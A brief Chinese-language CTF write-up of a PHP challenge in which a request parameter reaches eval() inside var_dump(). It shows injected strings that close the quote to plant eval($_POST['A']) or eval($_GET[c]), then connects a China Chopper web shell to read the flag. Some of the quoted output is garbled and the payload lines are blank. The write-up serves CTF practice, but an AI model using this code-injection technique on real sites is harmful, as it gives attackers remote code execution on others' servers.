题目:
|
|
Solution
此时不扫更待何时。。。扫出一个 index2.php:12345678include "flag2.php";error_reporting(0);show_source(__FILE__);$a = @$_REQUEST['hello'];eval("var_dump($a);");
传入的参数会经过var_dump(),这里给出两种payload。
payload1
|
|
var_dump($a);后的结果为1string(22) ");eval($_POST['A']);//"
即1eval("string(21) ");eval($_GET['A']);//"");
payload2
|
|
var_dump()后的结果是1string(15) ");eval($_GET[c]"
即1eval("string(17) ");eval($_GET[c]" string(0) "" ");
因此可以通过构造闭合引号。用菜刀连上:
真正的flag在flag1.php里。得到flag:1F8871804DD8C20C66D2386B3E51ADEC4
题外话
已将此题收录进 CTF-Web-Challenge